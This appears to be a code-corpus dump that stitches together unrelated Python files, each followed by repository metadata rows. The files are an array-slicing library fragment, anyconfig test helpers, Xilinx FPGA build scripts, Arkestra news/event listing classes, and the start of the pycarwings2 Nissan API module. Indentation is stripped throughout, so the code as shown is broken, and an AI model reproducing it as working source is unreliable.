# newaxis_at = []
has_ellipsis = False
int_count = 0
for item in index_tup:
if isinstance(item, numbers.Number):
int_count += 1
# NOTE: If we need locations of new axis, re-enable this.
if item is None: # pragma: no cover
pass
# newaxis_at.append(len(index_list) + len(newaxis_at) - int_count)
elif item == Ellipsis:
if has_ellipsis: # pragma: no cover
raise IndexError("an index can only have a single ellipsis ('...')")
has_ellipsis = True
initial_len = len(index_list)
while len(index_list) + (concrete_indices - initial_len) < max_dim:
index_list.append(slice(None))
else:
index_list.append(item)
if len(index_list) > max_dim: # pragma: no cover
raise IndexError("too many indices for array")
while len(index_list) < max_dim:
index_list.append(slice(None))
# return index_list, newaxis_at
return tuple(index_list)
def _handle_aliases(index_tup: Tuple, alias_lookup) -> Tuple:
new_index_tup = []
def resolve(item, dim):
if isinstance(item, slice):
return item
# Replace element if in alias lookup, otherwise use original.
item = alias_lookup.get(dim, item, item)
return item
# Go through each element within the index and resolve if needed.
for dim, item in enumerate(index_tup):
if isinstance(item, list):
new_item = []
for sub_item in item:
new_item.append(resolve(sub_item, dim))
else:
new_item = resolve(item, dim)
new_index_tup.append(new_item)
return tuple(new_index_tup)
class Tracked(AtomicSlicer):
""" Tracked defines an object that slicer wraps."""
def __init__(self, o: Any, dim: Union[int, List, tuple, None, str] = "auto"):
""" Defines an object that will be wrapped by slicer.
Args:
o: Object that will be tracked for slicer.
dim: Target dimension(s) slicer will index on for this object.
"""
super().__init__(o)
# Protected attribute that can be overriden.
self._name = None
# Place dim into coordinate form.
if dim == "auto":
self.dim = list(range(self.max_dim))
elif dim is None:
self.dim = []
elif isinstance(dim, int):
self.dim = [dim]
elif isinstance(dim, list):
self.dim = dim
elif isinstance(dim, tuple):
self.dim = list(dim)
else: # pragma: no cover
raise ValueError(f"Cannot handle dim of type: {type(dim)}")
class Obj(Tracked):
""" An object that slicer wraps. """
def __init__(self, o, dim="auto"):
super().__init__(o, dim)
class Alias(Tracked):
""" Defines a tracked object as well as additional __getitem__ keys. """
def __init__(self, o, dim):
if not (
isinstance(dim, int) or (isinstance(dim, (list, tuple)) and len(dim) <= 1)
): # pragma: no cover
raise ValueError("Aliases must track a single dimension")
super().__init__(o, dim)
class AliasLookup:
def __init__(self, aliases):
self._lookup = {}
# Populate lookup and merge indexes.
for _, alias in aliases.items():
self.update(alias)
def update(self, alias):
if alias.dim is None or len(alias.dim) == 0:
return
dim = alias.dim[0]
if dim not in self._lookup:
self._lookup[dim] = {}
dim_lookup = self._lookup[dim]
# NOTE: Alias must be backed by either a list or dictionary.
itr = enumerate(alias.o) if isinstance(alias.o, list) else alias.o.items()
for i, x in itr:
if x not in dim_lookup:
dim_lookup[x] = set()
dim_lookup[x].add(i)
def delete(self, alias):
'''Delete an alias that exists from lookup'''
dim = alias.dim[0]
dim_lookup = self._lookup[dim]
# NOTE: Alias must be backed by either a list or dictionary.
itr = enumerate(alias.o) if isinstance(alias.o, list) else alias.o.items()
for i, x in itr:
del dim_lookup[x]
def get(self, dim, target, default=None):
if dim not in self._lookup:
return default
indexes = self._lookup[dim].get(target, None)
if indexes is None:
return default
if len(indexes) == 1:
return next(iter(indexes))
else:
return list(indexes)
def resolve_dim(slicer_index: Tuple, slicer_dim: List) -> List:
""" Extracts new dim after applying slicing index and maps it back to the original index list. """
new_slicer_dim = []
reduced_mask = []
for _, curr_idx in enumerate(slicer_index):
if isinstance(curr_idx, (tuple, list, slice)):
reduced_mask.append(0)
else:
reduced_mask.append(1)
for curr_dim in slicer_dim:
if reduced_mask[curr_dim] == 0:
new_slicer_dim.append(curr_dim - sum(reduced_mask[:curr_dim]))
return new_slicer_dim
def reduced_o(tracked: Tracked) -> Union[List, Any]:
os = [t.o for t in tracked]
os = os[0] if len(os) == 1 else os
return os
class BaseHandler:
@classmethod
@abstractmethod
def head_slice(cls, o, index_tup, max_dim):
raise NotImplementedError() # pragma: no cover
@classmethod
@abstractmethod
def tail_slice(cls, o, tail_index, max_dim, flatten=True):
raise NotImplementedError() # pragma: no cover
@classmethod
@abstractmethod
def max_dim(cls, o):
raise NotImplementedError() # pragma: no cover
@classmethod
def default_alias(cls, o):
return []
class SeriesHandler(BaseHandler):
@classmethod
def head_slice(cls, o, index_tup, max_dim):
head_index = index_tup[0]
is_element = True if isinstance(head_index, int) else False
sliced_o = o.iloc[head_index]
return is_element, sliced_o, 1
@classmethod
def tail_slice(cls, o, tail_index, max_dim, flatten=True):
# NOTE: Series only has one dimension,
# call slicer again to end the recursion.
return AtomicSlicer(o, max_dim=max_dim)[tail_index]
@classmethod
def max_dim(cls, o):
return len(o.shape)
@classmethod
def default_alias(cls, o):
index_alias = Alias(o.index.to_list(), 0)
index_alias._name = "index"
return [index_alias]
class DataFrameHandler(BaseHandler):
@classmethod
def head_slice(cls, o, index_tup, max_dim):
# NOTE: At head slice, we know there are two fixed dimensions.
cut_index = index_tup
is_element = True if isinstance(cut_index[-1], int) else False
sliced_o = o.iloc[cut_index]
return is_element, sliced_o, 2
@classmethod
def tail_slice(cls, o, tail_index, max_dim, flatten=True):
# NOTE: Dataframe has fixed dimensions,
# call slicer again to end the recursion.
return AtomicSlicer(o, max_dim=max_dim)[tail_index]
@classmethod
def max_dim(cls, o):
return len(o.shape)
@classmethod
def default_alias(cls, o):
index_alias = Alias(o.index.to_list(), 0)
index_alias._name = "index"
column_alias = Alias(o.columns.to_list(), 1)
column_alias._name = "columns"
return [index_alias, column_alias]
class ArrayHandler(BaseHandler):
@classmethod
def head_slice(cls, o, index_tup, max_dim):
# Check if head is string
head_index, tail_index = index_tup[0], index_tup[1:]
cut = 1
for sub_index in tail_index:
if isinstance(sub_index, str) or cut == len(o.shape):
break
cut += 1
# Process native array dimensions
cut_index = index_tup[:cut]
is_element = any([True if isinstance(x, int) else False for x in cut_index])
sliced_o = o[cut_index]
return is_element, sliced_o, cut
@classmethod
def tail_slice(cls, o, tail_index, max_dim, flatten=True):
if flatten:
# NOTE: If we're dealing with a scipy matrix,
# we have to manually flatten it ourselves
# to keep consistent to the rest of slicer's API.
if _safe_isinstance(o, "scipy.sparse.csc", "csc_matrix"):
return AtomicSlicer(o.toarray().flatten(), max_dim=max_dim)[tail_index]
elif _safe_isinstance(o, "scipy.sparse.csr", "csr_matrix"):
return AtomicSlicer(o.toarray().flatten(), max_dim=max_dim)[tail_index]
elif _safe_isinstance(o, "scipy.sparse.dok", "dok_matrix"):
return AtomicSlicer(o.toarray().flatten(), max_dim=max_dim)[tail_index]
elif _safe_isinstance(o, "scipy.sparse.lil", "lil_matrix"):
return AtomicSlicer(o.toarray().flatten(), max_dim=max_dim)[tail_index]
else:
return AtomicSlicer(o, max_dim=max_dim)[tail_index]
else:
inner = [AtomicSlicer(e, max_dim=max_dim)[tail_index] for e in o]
if _safe_isinstance(o, "numpy", "ndarray"):
import numpy
if len(inner) > 0 and hasattr(inner[0], "__len__"):
ragged = not all(len(x) == len(inner[0]) for x in inner)
else:
ragged = False
if ragged:
return numpy.array(inner, dtype=numpy.object)
else:
return numpy.array(inner)
elif _safe_isinstance(o, "torch", "Tensor"):
import torch
if len(inner) > 0 and isinstance(inner[0], torch.Tensor):
return torch.stack(inner)
else:
return torch.tensor(inner)
elif _safe_isinstance(o, "scipy.sparse.csc", "csc_matrix"):
from scipy.sparse import vstack
out = vstack(inner, format='csc')
return out
elif _safe_isinstance(o, "scipy.sparse.csr", "csr_matrix"):
from scipy.sparse import vstack
out = vstack(inner, format='csr')
return out
elif _safe_isinstance(o, "scipy.sparse.dok", "dok_matrix"):
from scipy.sparse import vstack
out = vstack(inner, format='dok')
return out
elif _safe_isinstance(o, "scipy.sparse.lil", "lil_matrix"):
from scipy.sparse import vstack
out = vstack(inner, format='lil')
return out
else:
raise ValueError(f"Cannot handle type {type(o)}.") # pragma: no cover
@classmethod
def max_dim(cls, o):
if _safe_isinstance(o, "numpy", "ndarray") and o.dtype == "object":
return max([UnifiedDataHandler.max_dim(x) for x in o], default=-1) + 1
else:
return len(o.shape)
class DictHandler(BaseHandler):
@classmethod
def head_slice(cls, o, index_tup, max_dim):
head_index = index_tup[0]
if isinstance(head_index, (tuple, list)) and len(index_tup) == 0:
return False, o, 1
if isinstance(head_index, (list, tuple)):
return (
False,
{
sub_index: AtomicSlicer(o, max_dim=max_dim)[sub_index]
for sub_index in head_index
},
1,
)
elif isinstance(head_index, slice):
if head_index == slice(None, None, None):
return False, o, 1
return False, o[head_index], 1
else:
return True, o[head_index], 1
@classmethod
def tail_slice(cls, o, tail_index, max_dim, flatten=True):
if flatten:
return AtomicSlicer(o, max_dim=max_dim)[tail_index]
else:
return {
k: AtomicSlicer(e, max_dim=max_dim)[tail_index] for k, e in o.items()
}
@classmethod
def max_dim(cls, o):
return max([UnifiedDataHandler.max_dim(x) for x in o.values()], default=-1) + 1
class ListTupleHandler(BaseHandler):
@classmethod
def head_slice(cls, o, index_tup, max_dim):
head_index = index_tup[0]
if isinstance(head_index, (tuple, list)) and len(index_tup) == 0:
return False, o, 1
if isinstance(head_index, (list, tuple)):
if len(head_index) == 0:
return False, o, 1
else:
results = [
AtomicSlicer(o, max_dim=max_dim)[sub_index]
for sub_index in head_index
]
results = tuple(results) if isinstance(o, tuple) else results
return False, results, 1
elif isinstance(head_index, slice):
return False, o[head_index], 1
elif isinstance(head_index, int):
return True, o[head_index], 1
else: # pragma: no cover
raise ValueError(f"Invalid key {head_index} for {o}")
@classmethod
def tail_slice(cls, o, tail_index, max_dim, flatten=True):
if flatten:
return AtomicSlicer(o, max_dim=max_dim)[tail_index]
else:
results = [AtomicSlicer(e, max_dim=max_dim)[tail_index] for e in o]
return tuple(results) if isinstance(o, tuple) else results
@classmethod
def max_dim(cls, o):
return max([UnifiedDataHandler.max_dim(x) for x in o], default=-1) + 1
class UnifiedDataHandler:
""" Registry that maps types to their unified slice calls."""
""" Class attribute that maps type to their unified slice calls."""
type_map = {
("builtins", "list"): ListTupleHandler,
("builtins", "tuple"): ListTupleHandler,
("builtins", "dict"): DictHandler,
("torch", "Tensor"): ArrayHandler,
("numpy", "ndarray"): ArrayHandler,
("scipy.sparse.csc", "csc_matrix"): ArrayHandler,
("scipy.sparse.csr", "csr_matrix"): ArrayHandler,
("scipy.sparse.dok", "dok_matrix"): ArrayHandler,
("scipy.sparse.lil", "lil_matrix"): ArrayHandler,
("pandas.core.frame", "DataFrame"): DataFrameHandler,
("pandas.core.series", "Series"): SeriesHandler,
}
@classmethod
def slice(cls, o, index_tup, max_dim):
# NOTE: Unified handles base cases such as empty tuples, which
# specialized handlers do not.
if isinstance(index_tup, (tuple, list)) and len(index_tup) == 0:
return o
# Slice as delegated by data handler.
o_type = _type_name(o)
head_slice = cls.type_map[o_type].head_slice
tail_slice = cls.type_map[o_type].tail_slice
is_element, sliced_o, cut = head_slice(o, index_tup, max_dim)
out = tail_slice(sliced_o, index_tup[cut:], max_dim - cut, is_element)
return out
@classmethod
def max_dim(cls, o):
o_type = _type_name(o)
if o_type not in cls.type_map:
return 0
return cls.type_map[o_type].max_dim(o)
@classmethod
def default_alias(cls, o):
o_type = _type_name(o)
if o_type not in cls.type_map:
return {}
return cls.type_map[o_type].default_alias(o)
def _type_name(o: object) -> Tuple[str, str]:
return o.__class__.__module__, o.__class__.__name__
def _safe_isinstance(
o: object, module_name: str, type_name: Union[str, set, tuple]
) -> bool:
o_module, o_type = _type_name(o)
if isinstance(type_name, str):
return o_module == module_name and o_type == type_name
else:
return o_module == module_name and o_type in type_name
| mit | -3,487,946,828,939,720,700 | 32.377023 | 117 | 0.573132 | false |
ssato/python-anyconfig | tests/base/utils.py | 1 | 3492 | #
# Copyright (C) 2021 Satoru SATOH <[email protected]>
# License: MIT
#
"""File based test data collector.
"""
import ast
import importlib.util
import json
import pathlib
import typing
import warnings
from .datatypes import (
DictT, MaybePathT, TDataPaths
)
def target_by_parent(self: str = __file__):
"""
>>> target_by_parent()
'base'
"""
return pathlib.Path(self).parent.name
def load_from_py(py_path: typing.Union[str, pathlib.Path],
data_name: str = 'DATA') -> DictT:
""".. note:: It's not safe always.
"""
spec = importlib.util.spec_from_file_location('testmod', py_path)
mod = spec.loader.load_module()
return getattr(mod, data_name, None)
def load_literal_data_from_py(py_path: typing.Union[str, pathlib.Path]
) -> DictT:
""".. note:: It might be safer than the above function.
"""
return ast.literal_eval(pathlib.Path(py_path).read_text().strip())
def maybe_data_path(datadir: pathlib.Path, name: str,
should_exist: typing.Iterable[str] = (),
file_ext: str = '*'
) -> typing.Optional[pathlib.Path]:
"""
Get and return the file path of extra data file. Its filename will be
computed from the filename of the base data file given.
"""
pattern = f'{name}.{file_ext}'
if datadir.exists() and datadir.is_dir():
paths = sorted(datadir.glob(pattern))
if paths:
return paths[0] # There should be just one file found.
if datadir.name in should_exist:
raise OSError(f'{datadir!s}/{pattern} should exists but not')
return None
def load_data(path: MaybePathT,
default: typing.Optional[typing.Any] = None,
should_exist: bool = False,
exec_py: bool = False
) -> typing.Union[DictT, str]:
"""
Return data loaded from given path or the default value.
"""
if path is None and not should_exist:
return default
if path.exists():
if path.suffix == '.json':
return json.load(path.open())
if path.suffix == '.py':
return (
load_from_py if exec_py else load_literal_data_from_py
)(path)
if path.suffix == '.txt':
return path.read_text()
return path
raise ValueError(f'Not exist or an invalid data: {path!s}')
def each_data_from_dir(datadir: pathlib.Path, pattern: str = '*.json',
should_exist: typing.Iterable[str] = ()
) -> typing.Iterator[TDataPaths]:
"""
Yield a collection of paths of data files under given dir.
"""
if not datadir.is_dir():
raise ValueError(f'Not look a data dir: {datadir!s}')
for inp in sorted(datadir.glob(pattern)):
if not inp.exists():
warnings.warn(f'Not exists: {inp!s}')
continue
if not inp.is_file():
warnings.warn(f'Not looks a file: {inp!s}')
continue
name = inp.stem
yield TDataPaths(
datadir,
inp,
maybe_data_path(datadir / 'e', name, should_exist),
maybe_data_path(datadir / 'o', name, should_exist),
maybe_data_path(datadir / 's', name, should_exist),
maybe_data_path(datadir / 'q', name, should_exist),
maybe_data_path(datadir / 'c', name, should_exist)
)
# vim:sw=4:ts=4:et:
| mit | -5,399,448,639,285,853,000 | 27.859504 | 73 | 0.570447 | false |
dawsonjon/Chips-Demo | demo/build_tools.py | 1 | 7582 | #!/usr/bin/env python
"""compile, build and download the ATLYS demo to the ATLYS development kit"""
import sys
import os
import shutil
from user_settings import ise, vivado
def build_ise(chip, bsp, working_directory):
"""Build using Xilinx ISE an FPGA using the specified BSP
chip is a chip instance.
bsp specifies a directory that must contain:
bsp.py - A python module defining:
chip - a model of the target hardware
buildoptions - the target part
buildtool - the target part
downloadoptions - the target part
downloadtool - the target part
bsp.prj - A partial xilinx prj file containing bsp source files
bsp.ucf - A constraints file containing the user constraints
*.v - verilog source files
*.vhd - vhdl source files
xst_mixed.opt - synthesis options
balanced.opt - place and route options
bitgen.opt - bitgen options
"""
source_files = [i + ".v" for i in chip.components]
source_files += [chip.name + ".v"]
source_files += ["chips_lib.v"]
#Create a project area
#
bsp_dir = os.path.dirname(bsp.__file__)
if not os.path.exists(working_directory):
os.mkdir(working_directory)
current_directory = os.getcwd()
shutil.copyfile(os.path.join(bsp_dir, "bsp.ucf"), os.path.join(working_directory, "bsp.ucf"))
shutil.copyfile(os.path.join(bsp_dir, "xst_mixed.opt"), os.path.join(working_directory, "xst_mixed.opt"))
shutil.copyfile(os.path.join(bsp_dir, "balanced.opt"), os.path.join(working_directory, "balanced.opt"))
shutil.copyfile(os.path.join(bsp_dir, "bitgen.opt"), os.path.join(working_directory, "bitgen.opt"))
#create a comprehensive file list
#
#first add the source files
print "Creating ISE project ..."
prj_file = open(os.path.join(working_directory, "bsp.prj"), 'w')
for path in source_files:
print "Adding file ...", path
_, filename = os.path.split(path)
if filename.upper().endswith(".V"):
prj_file.write("verilog work " + filename + "\n")
elif filename.upper().endswith(".VHD") or filename.upper().endswith(".VHDL"):
prj_file.write("vhdl work " + filename + "\n")
#then add the bsp files
bsp_files = open(os.path.join(bsp_dir, "bsp.prj")).read().splitlines()
for filename in bsp_files:
print "Adding file ...", filename
from_file = os.path.join(bsp_dir, filename)
filename = os.path.split(from_file)[1]
to_file = os.path.join(working_directory, filename)
shutil.copyfile(from_file, to_file)
if filename.upper().endswith(".V"):
prj_file.write("verilog work " + filename + "\n")
elif filename.upper().endswith(".VHD") or filename.upper().endswith(".VHDL"):
prj_file.write("vhdl work " + filename + "\n")
prj_file.close()
#run the xilinx build
#
os.chdir(working_directory)
print "Building Demo using Xilinx ise ...."
retval = os.system("%s/xflow -synth xst_mixed.opt -p %s -implement balanced.opt -config bitgen.opt bsp"%(ise, bsp.device))
if retval != 0:
sys.exit(-1)
os.chdir(current_directory)
def build_vivado(chip, bsp, working_directory):
"""Build using Xilinx Vivado an FPGA using the specified BSP
chip is a chip instance.
bsp specifies a directory that must contain:
bsp.py - A python module defining:
chip - a model of the target hardware
device - the target part
buildtool - the appriopriate build tool
downloadoptions - the target part
bsp.prj - A partial xilinx prj file containing bsp source files
bsp.xdc - A constraints file containing the user constraints
*.v - verilog source files
*.vhd - vhdl source files
"""
source_files = [i + ".v" for i in chip.components]
source_files += [chip.name + ".v"]
source_files += ["chips_lib.v"]
#Create a project area
#
bsp_dir = os.path.dirname(bsp.__file__)
if not os.path.exists(working_directory):
os.makedirs(working_directory)
current_directory = os.getcwd()
from_file = os.path.join(bsp_dir, "bsp.xdc")
to_file = os.path.join(working_directory, "bsp.xdc")
shutil.copyfile(from_file, to_file)
#create a comprehensive file list
#
#first add the source files
print "Creating Vivado project ..."
prj_file = open(os.path.join(working_directory, "bsp.tcl"), 'w')
prj_file.write(
"""# STEP#1: define the output directory area.
#
set outputDir .
# STEP#2: setup design sources and constraints
#
read_xdc ./bsp.xdc
""")
#first add the source files
for path in source_files:
print "Adding file ...", path
_, filename = os.path.split(path)
if filename.upper().endswith(".V"):
prj_file.write("read_verilog " + filename + "\n")
elif filename.upper().endswith(".VHD") or filename.upper().endswith(".VHDL"):
prj_file.write("read_vhdl " + filename + "\n")
#then add the bsp files
bsp_files = open(os.path.join(bsp_dir, "bsp.prj")).read().splitlines()
for filename in bsp_files:
print "Adding file ...", filename
from_file = os.path.join(bsp_dir, filename)
filename = os.path.split(from_file)[1]
to_file = os.path.join(working_directory, os.path.split(from_file)[1])
shutil.copyfile(from_file, to_file)
if filename.upper().endswith(".V"):
prj_file.write("read_verilog " + filename + "\n")
elif filename.upper().endswith(".VHD") or filename.upper().endswith(".VHDL"):
prj_file.write("read_vhdl " + filename + "\n")
prj_file.write(
"""
#
# STEP#3: run synthesis, write design checkpoint, report timing,
# and utilization estimates
#
synth_design -top bsp -part %s
write_checkpoint -force $outputDir/post_synth.dcp
report_timing_summary -file $outputDir/post_synth_timing_summary.rpt
report_utilization -file $outputDir/post_synth_util.rpt
# STEP#4: run logic optimization, placement and physical logic optimization,
# write design checkpoint, report utilization and timing estimates
#
opt_design
place_design
report_clock_utilization -file $outputDir/clock_util.rpt
#
phys_opt_design
write_checkpoint -force $outputDir/post_place.dcp
report_utilization -file $outputDir/post_place_util.rpt
report_timing_summary -file $outputDir/post_place_timing_summary.rpt
#
# STEP#5: run the router, write the post-route design checkpoint, report the routing
# status, report timing, power, and DRC, and finally save the Verilog netlist.
#
route_design
write_checkpoint -force $outputDir/post_route.dcp
report_route_status -file $outputDir/post_route_status.rpt
report_timing_summary -file $outputDir/post_route_timing_summary.rpt
report_power -file $outputDir/post_route_power.rpt
report_drc -file $outputDir/post_imp_drc.rpt
write_verilog -force $outputDir/cpu_impl_netlist.v -mode timesim -sdf_anno true
#
# STEP#6: generate a bitstream
#
write_bitstream -force $outputDir/bsp.bit
""" % bsp.device)
prj_file.close()
#run the xilinx build
#
os.chdir(working_directory)
print "Building Demo using Xilinx ise ...."
retval = os.system("%s/vivado -mode batch -source bsp.tcl"%vivado)
if retval != 0:
sys.exit(-1)
os.chdir(current_directory)
| mit | 4,379,624,543,296,484,400 | 35.805825 | 126 | 0.639409 | false |
evildmp/Arkestra | news_and_events/lister.py | 1 | 13293 | import operator
from datetime import datetime, timedelta
from django.db.models import Q
from django.utils.translation import ugettext_lazy as _
from arkestra_utilities.generic_lister import (
ArkestraGenericLister, ArkestraGenericList, ArkestraGenericFilterSet,
ArkestraGenericPluginLister
)
from arkestra_utilities.settings import (
NEWS_AND_EVENTS_LAYOUT, LISTER_MAIN_PAGE_LIST_LENGTH,
AGE_AT_WHICH_ITEMS_EXPIRE, MULTIPLE_ENTITY_MODE
)
from .models import NewsArticle, Event
import menu
class NewsList(ArkestraGenericList):
model = NewsArticle
heading_text = _(u"News")
def remove_expired(self):
# remove expired
if AGE_AT_WHICH_ITEMS_EXPIRE:
expiry_date = datetime.now() - \
timedelta(days=AGE_AT_WHICH_ITEMS_EXPIRE)
self.items = self.items.filter(date__gte=expiry_date)
def other_items(self):
# supply a list of links to available other items
other_items = []
if "archive" in self.other_item_kinds:
other_items.append({
"link": self.entity.get_auto_page_url("news-archive"),
"title": "News archive",
"count": self.archived_items.count(),
})
if "main" in self.other_item_kinds:
auto_page_title = menu.menu_dict["title_attribute"]
if not MULTIPLE_ENTITY_MODE:
title = getattr(self.entity, auto_page_title)
else:
title = "%s %s" % (
self.entity.short_name,
getattr(self.entity, auto_page_title).lower()
)
other_items.append({
"link": self.entity.get_auto_page_url("news-and-events"),
"title": title,
"css_class": "main"
})
return other_items
def re_order_by_importance(self):
# re-order by importance as well as date
if self.order_by == "importance/date":
ordinary_items = []
# split the within-date items for this entity into two sets
sticky_items = self.items.order_by('-importance').filter(
Q(hosted_by=self.entity) | Q(is_sticky_everywhere=True),
sticky_until__gte=datetime.today(),
)
non_sticky_items = self.items.exclude(
Q(hosted_by=self.entity) | Q(is_sticky_everywhere=True),
sticky_until__gte=datetime.today(),
)
top_items = list(sticky_items)
# now go through the non-top items, and find any that can be
# promoted
# get the set of dates where possible promotable items can be found
dates = non_sticky_items.dates('date', 'day').reverse()
for date in dates:
# get all non-top items from this date
possible_top_items = non_sticky_items.filter(
date__year=date.year,
date__month=date.month,
date__day=date.day
)
# promotable items have importance > 0
# add the promotable ones to the top items list
top_items.extend(possible_top_items.filter(
Q(hosted_by=self.entity) | Q(is_sticky_everywhere=True),
importance__gte=1)
)
# if this date set contains any unimportant items, then
# there are no more to promote
demotable_items = possible_top_items.exclude(
Q(hosted_by=self.entity) | Q(is_sticky_everywhere=True),
importance__gte=1
)
if demotable_items.count() > 0:
# put those unimportant items into ordinary items
ordinary_items.extend(demotable_items)
# and stop looking for any more
break
# and add everything left in non-sticky items before this date
if dates:
remaining_items = non_sticky_items.filter(date__lte=date)
ordinary_items.extend(remaining_items)
for item in top_items:
item.sticky = True
if self.item_format == "title":
item.importance = None
ordinary_items.sort(
key=operator.attrgetter('date'),
reverse=True
)
self.items = top_items + ordinary_items
def build(self):
self.items = self.model.objects.listable_objects()
self.set_items_for_entity()
self.archived_items = self.items
self.remove_expired()
self.re_order_by_importance()
self.truncate_items()
self.set_show_when()
class NewsListCurrent(NewsList):
other_item_kinds = ("archive")
class NewsListPlugin(NewsList):
def build(self):
self.items = self.model.objects.listable_objects()
self.set_items_for_entity()
self.remove_expired()
self.re_order_by_importance() # expensive; shame it has to be here
self.truncate_items()
self.set_show_when()
class NewsListForPerson(NewsList):
def build(self):
self.items = self.model.objects.listable_objects()
self.set_items_for_person(self)
self.re_order_by_importance() # expensive; shame it has to be here
self.set_show_when()
class NewsArkestraGenericFilterSet(ArkestraGenericFilterSet):
fields = ['date']
class NewsListArchive(NewsList):
other_item_kinds = ("main")
filter_set = NewsArkestraGenericFilterSet
search_fields = [
{
"field_name": "text",
"field_label": "Search title/summary",
"placeholder": "Search",
"search_keys": [
"title__icontains",
"summary__icontains",
],
},
]
def build(self):
self.items = self.model.objects.listable_objects()
self.set_items_for_entity()
self.filter_on_search_terms()
self.itemfilter = self.filter_set(self.items, self.request.GET)
class EventsList(ArkestraGenericList):
model = Event
heading_text = _(u"Events")
item_collections = (
"actual_events",
"forthcoming_events",
"previous_events"
)
item_template = "news_and_events/event_list_item.html"
def build(self):
self.items = self.model.objects.listable_objects()
self.set_items_for_entity()
self.create_item_collections()
self.truncate_items()
self.set_show_when()
def create_item_collections(self):
if any(
kind in self.item_collections
for kind in (
"actual_events",
"forthcoming_events",
"previous_events"
)):
self.actual_events = self.items.filter(
# an actual event is one that:
# (either has no parent or whose parent is a series) and
# is not a series itself
Q(parent=None) | Q(parent__series=True),
series=False,
).order_by('date', 'start_time')
# (event starting after today) or (not a single-day
# event and ends after today)
forthcoming = Q(date__gte=self.now) | \
Q(single_day_event=False, end_date__gte=self.now)
if "forthcoming_events" in self.item_collections:
self.forthcoming_events = self.actual_events.filter(forthcoming)
if "previous_events" in self.item_collections:
self.previous_events = self.actual_events.exclude(
forthcoming
).reverse()
self.items = getattr(self, self.item_collections[0])
def set_items_for_person(self):
self.items = self.items.filter(please_contact=self.person) | \
self.items.filter(featuring=self.person)
def set_items_for_place(self):
self.items = self.items.filter(building=self.place)
def other_items(self):
other_items = []
if "forthcoming_events" in self.other_item_kinds and self.forthcoming_events.exists():
other_items.append({
"link": self.entity.get_auto_page_url("events-forthcoming"),
"title": "All forthcoming events",
"count": self.forthcoming_events.count(),
})
if "previous_events" in self.other_item_kinds and self.previous_events.exists():
other_items.append({
"link": self.entity.get_auto_page_url("events-archive"),
"title": "Previous events",
"count": self.previous_events.count(),
})
if "main" in self.other_item_kinds:
auto_page_title = menu.menu_dict["title_attribute"]
if not MULTIPLE_ENTITY_MODE:
title = getattr(self.entity, auto_page_title)
else:
title = "%s %s" % (
self.entity.short_name,
getattr(self.entity, auto_page_title).lower()
)
other_items.append({
"link": self.entity.get_auto_page_url("news-and-events"),
"title": title,
"css_class": "main"
})
return other_items
class EventsListCurrent(EventsList):
item_collections = ("forthcoming_events", "previous_events")
other_item_kinds = ("previous_events", "forthcoming_events")
class EventsListPlugin(EventsList):
item_collections = ("forthcoming_events",)
class EventsListForPlace(EventsList):
item_collections = ("forthcoming_events",)
def build(self):
self.items = self.model.objects.listable_objects()
self.set_items_for_place()
self.create_item_collections()
self.truncate_items()
self.set_show_when()
class EventsListForPerson(EventsList):
item_collections = ("forthcoming_events",)
def build(self):
self.items = self.model.objects.listable_objects()
self.set_items_for_person()
self.create_item_collections()
self.truncate_items()
self.set_show_when()
class EventsArkestraGenericFilterSet(ArkestraGenericFilterSet):
fields = ['date', 'type']
class EventsFilterList(EventsList):
filter_set = EventsArkestraGenericFilterSet
search_fields = [
{
"field_name": "text",
"field_label": "Title/summary",
"placeholder": "Search",
"search_keys": [
"title__icontains",
"summary__icontains",
],
},
]
def build(self):
self.items = self.model.objects.listable_objects()
self.set_items_for_entity()
self.create_item_collections()
self.filter_on_search_terms()
self.itemfilter = self.filter_set(self.items, self.request.GET)
class EventsListForthcoming(EventsFilterList):
item_collections = ("forthcoming_events", "previous_events")
other_item_kinds = ("previous_events", "main")
heading_text = _(u"Forthcoming events")
class EventsListArchive(EventsFilterList):
item_collections = ("previous_events", "forthcoming_events")
other_item_kinds = ("forthcoming_events", "main")
heading_text = _(u"Previous events")
class NewsAndEventsCurrentLister(ArkestraGenericLister):
listkinds = [
("news", NewsListCurrent),
("events", EventsListCurrent),
]
display = "news events"
order_by = "importance/date"
layout = NEWS_AND_EVENTS_LAYOUT
limit_to = LISTER_MAIN_PAGE_LIST_LENGTH
class NewsAndEventsMenuLister(ArkestraGenericLister):
listkinds = [
("news", NewsListCurrent),
("events", EventsListCurrent),
]
display = "news and events"
limit_to = LISTER_MAIN_PAGE_LIST_LENGTH
class NewsAndEventsPluginLister(ArkestraGenericPluginLister):
listkinds = [
("news", NewsListPlugin),
("events", EventsListPlugin),
]
def other_items(self):
link = self.entity.get_auto_page_url(menu.menu_dict["url_attribute"])
return [{
"link": link,
"title": "More %s" % self.display,
"css_class": "main"
}]
class NewsAndEventsPersonLister(ArkestraGenericLister):
layout = NEWS_AND_EVENTS_LAYOUT
listkinds = [
("news", NewsListForPerson),
("events", EventsListForPerson),
]
display = "news events"
class NewsArchiveLister(ArkestraGenericLister):
listkinds = [("news", NewsListArchive)]
display = "news"
class EventsArchiveLister(ArkestraGenericLister):
listkinds = [("events", EventsListArchive)]
display = "events"
item_format = "details image venue"
class EventsForthcomingLister(ArkestraGenericLister):
listkinds = [("events", EventsListForthcoming)]
display = "events"
item_format = "details image venue"
class EventsPlaceLister(ArkestraGenericLister):
listkinds = [("events", EventsListForPlace)]
display = "events"
| bsd-2-clause | -7,668,943,796,908,751,000 | 31.421951 | 94 | 0.576168 | false |
jdhorne/pycarwings2 | pycarwings2/pycarwings2.py | 1 | 13350 | # Copyright 2016 Jason Horne
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
When logging in, you must specify a geographic 'region' parameter. The only
known values for this are as follows:
NNA : USA
NE : Europe
NCI : Canada
NMA : Australia
NML : Japan
Information about Nissan on the web (e.g. http://nissannews.com/en-US/nissan/usa/pages/executive-bios)
suggests others (this page suggests NMEX for Mexico, NLAC for Latin America) but
these have not been confirmed.
There are three asynchronous operations in this API, paired with three follow-up
"status check" methods.
request_update -> get_status_from_update
start_climate_control -> get_start_climate_control_result
stop_climate_control -> get_stop_climate_control_result
The asynchronous operations immediately return a 'result key', which
is then supplied as a parameter for the corresponding status check method.
Here's an example response from an asynchronous operation, showing the result key:
{
"status":200,
"userId":"[email protected]",
"vin":"1ABCDEFG2HIJKLM3N",
